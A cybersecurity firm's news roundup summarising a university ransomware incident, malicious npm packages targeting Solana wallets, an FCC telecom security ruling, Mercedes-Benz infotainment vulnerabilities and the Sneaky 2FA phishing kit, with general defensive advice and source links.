Canary Trap’s Bi-Weekly Cyber Roundup
Welcome to Canary Trap’s “Bi-Weekly Cyber Roundup”. At Canary Trap, it is our mission to keep you up-to-date with the most crucial news in the world of cybersecurity, and this bi-weekly publication is your gateway to the latest news.
This week’s round-up highlights critical developments across the cybersecurity landscape. From a university’s swift response to unusual network activity to hackers leveraging npm packages to target Solana wallets, the threat environment continues to evolve. We also examine the FCC’s response to telecom hacking linked to China, vulnerabilities identified in Mercedes-Benz infotainment systems, and a sophisticated phishing kit targeting Microsoft 365 accounts via Telegram. Stay informed with these in-depth analyses of the latest security challenges and trends.
- University of Oklahoma Isolates Systems After ‘Unusual Activity’ on IT Network
The University of Oklahoma has reported unusual cyber activity on its IT network and is taking measures to address the situation. The university, which serves over 34,000 students, appeared on the leak site of a ransomware group earlier last week. The group claims to have stolen 91 MB of sensitive data, allegedly including employee records, financial information, and other details.
In a statement, a university spokesperson confirmed the discovery of the activity: “The University recently identified unusual activity on our IT network. Upon discovery, we isolated certain systems and are investigating the matter. As part of this ongoing process, measures are being implemented across our network.” No further details were provided regarding the cause of the incident, the systems affected, or whether a ransom might be paid.
The timing of the incident coincided with the first official day of the new semester. Just days earlier, a snowstorm forced the campus to close and staff to work remotely, which may have contributed to the vulnerability.
The ransomware group behind the attack, known as Fog, has a history of targeting higher education institutions. Emerging in May 2024, the group has focused predominantly on U.S.-based organizations, with 80% of its victims in the education sector. Arctic Wolf researchers noted that Fog often exploits compromised VPN credentials to gain unauthorized access to networks. Their investigations revealed that these attacks utilized credentials associated with two different VPN gateway vendors.
Large universities, including the University of Oklahoma, are particularly susceptible to ransomware attacks during holidays or other periods when IT staff are stretched thin. Similar incidents have affected other major institutions, such as Stanford University and the University of Michigan, which were forced to take portions of their networks offline following ransomware infections.
The situation underscores the growing risk ransomware groups pose to the education sector, especially during times of operational disruption.
- Hackers Deploy Malicious npm Packages to Steal Solana Wallet Keys via Gmail SMTP
Cybersecurity researchers have uncovered three separate clusters of malicious packages hosted on the npm and Python Package Index (PyPI) repositories. These packages are designed to exfiltrate sensitive data and, in some cases, delete files on infected systems.
Supply chain security firm Socket identified four npm packages, that target Solana cryptocurrency wallets. These packages falsely advertise as Solana-specific tools but are engineered to intercept Solana private keys and transfer up to 98% of wallet funds to an attacker-controlled address.
The exfiltration is achieved using Gmail’s SMTP servers, leveraging Gmail’s trusted status to evade detection by firewalls and endpoint security tools. The attackers also maintained GitHub repositories that claimed to offer Solana development tools but instead imported the malicious npm packages. These repositories, linked to accounts like “moonshot-wif-hwan” and “Diveinprogramming,” have since been removed.
Malicious npm packages can take the threat further by including a “kill switch” function. This functionality repeatedly deletes files in project-specific directories and, in some instances, exfiltrates environment variables to a remote server.
Beyond npm and PyPI, attackers are also exploiting developers in the Roblox community by distributing fraudulent libraries to steal data. These libraries, often based on open-source stealer malware like Skuld and Blank-Grabber, target users seeking game cheats and mods.
These discoveries underscore the importance of rigorous security measures in the software supply chain, particularly for developers using open-source libraries. Verifying the authenticity of packages, avoiding suspicious repositories, and monitoring project dependencies are crucial steps in mitigating risks posed by malicious software.
- FCC Taking Action in Response to China’s Telecoms Hacking
The Federal Communications Commission (FCC) has issued a declaratory ruling mandating that telecommunications providers enhance their network security to address cybersecurity threats. The ruling, now open for public comment, also requires wireless carriers to annually certify that they have a cybersecurity risk management plan in place.
The FCC emphasized the urgency of protecting communications infrastructure, citing national security and public safety concerns. “The federal government must ensure communication systems remain operational for critical missions under any circumstances,” the agency stated. This decision follows cyberattacks attributed to Salt Typhoon, a Chinese state-sponsored threat actor, which targeted at least nine U.S. wireless carriers. The FCC highlighted that successful attacks on telecom networks could severely impact other critical infrastructure sectors, as these rely on secure communications for their operations.
Under the ruling, Section 105 of the Communications Assistance for Law Enforcement Act (CALEA), enacted in 1994, is interpreted to require telecom carriers, including broadband and VoIP providers, to secure their networks against unauthorized access or interception. Previously, the FCC ruled that carriers must prevent untrusted equipment suppliers from enabling illegal interceptions. The updated ruling broadens these responsibilities to include overall network management. “We reaffirm that Section 105 of CALEA obligates carriers to prevent unauthorized interception and access to call-identifying information, whether by law enforcement or other parties,” the FCC noted.
Additionally, the ruling proposes expanded cybersecurity and supply chain risk management requirements for various service providers, including broadcasters, cable and satellite operators, VoIP providers, and 911/988 service providers. Entities will need to implement cybersecurity plans aligned with NIST standards, ensuring the confidentiality, integrity, and availability of their systems. Senior executives will be required to endorse these plans.
The declaratory ruling is effective immediately, with the comment period closing 30 days after its publication in the Federal Register. This initiative underscores the FCC’s commitment to bolstering the resilience of U.S. telecommunications networks against evolving cybersecurity threats.
- Details Disclosed for Mercedes-Benz Infotainment Vulnerabilities
Kaspersky has revealed information about multiple vulnerabilities found in the Mercedes-Benz infotainment system, specifically the Mercedes-Benz User Experience (MBUX) head unit. The company has assured customers that these security issues have been addressed and are not easily exploitable.
Kaspersky’s findings build upon earlier research by a Chinese research team from 2021, with the Russian cybersecurity firm publishing the details in a blog post on Friday. The study focused on the first-generation MBUX system, identifying various flaws that could be used for denial-of-service (DoS) attacks, data extraction, command injection, and privilege escalation.
Some of the vulnerabilities could allow an attacker with physical access to the vehicle to disable anti-theft protections, alter vehicle settings, or unlock paid features, using USB or custom UPC connections. These vulnerabilities have been assigned CVE identifiers for 2023 and 2024. However, Mercedes-Benz confirmed to SecurityWeek that it was aware of these issues since 2022.
A company spokesperson explained, “In August 2022, external researchers informed us about potential issues with the first-generation MBUX. These vulnerabilities require physical access to the vehicle and the removal and opening of the head unit. Newer versions of the system are not affected.”
Mercedes-Benz emphasized that security is a high priority for the company and encouraged researchers to report vulnerabilities through its official disclosure program. In the past, some vulnerabilities have raised concerns about the potential for remote hacks of Mercedes-Benz vehicles, as well as issues related to the company’s IT infrastructure.
- Telegram-Based “Sneaky 2FA” Phishing Kit Targets Microsoft 365 Accounts
In December 2024, cybersecurity researchers at Sekoia.io identified a new Adversary-in-the-Middle (AiTM) phishing kit targeting Microsoft 365 accounts. Dubbed Sneaky 2FA, this kit has been active since at least October 2024, as confirmed by telemetry data, and is marketed as a Phishing-as-a-Service (PhaaS) solution through the Telegram-based service “Sneaky Log.”
Sneaky 2FA allows its users—typically cybercriminals—to deploy phishing pages using licensed and obfuscated source code. These phishing pages are often hosted on compromised WordPress websites or attacker-controlled domains. A key feature is the use of URL patterns that prefill phishing pages with victims’ email addresses for a more seamless attack. The kit is linked to elements from the W3LL Panel OV6, an older AiTM phishing framework, indicating a shared lineage or influence within the cybercriminal ecosystem.
Sneaky 2FA employs various tactics to bypass security measures:
Dynamic URL Patterns: Attackers generate phishing links with complex, trackable structures such as “mysilverfox.commy/00/#victimexamplecom.”
Anti-Bot Features: Cloudflare Turnstile challenges filter out bots and security scanners, allowing the phishing page to target human users effectively.
Obfuscation: HTML and JavaScript are heavily obfuscated, and text is often embedded as images to evade detection.
Anti-Debugging Mechanisms: The phishing pages use techniques to prevent analysis via browser developer tools.
The “Sneaky Log” Telegram bot serves as a central hub for purchasing the phishing kit, managing subscriptions, and providing support. Payments are accepted in cryptocurrencies like Bitcoin and Ethereum, with signs of potential money laundering activities through layered transactions.
Organizations can detect Sneaky 2FA campaigns by analyzing logs for anomalies, such as inconsistent User-Agent strings during authentication, which may indicate malicious activity. Tracking phishing URLs and domain registrations also offers a way to identify and disrupt campaigns.
The adoption of phishing-resistant authentication methods like FIDO2/WebAuthn, real-time URL scanning that bypasses evasion tactics, and proactive monitoring of domain registrations are recommended to mitigate the risk.
References:
https://thehackernews.com/2025/01/hackers-deploy-malicious-npm-packages.html
https://www.securityweek.com/fcc-taking-action-in-response-to-chinas-telecoms-hacking/
https://www.securityweek.com/details-disclosed-for-mercedes-benz-infotainment-vulnerabilities/
https://hackread.com/telegram-sneaky-2fa-phishing-kit-microsoft-365-accounts/
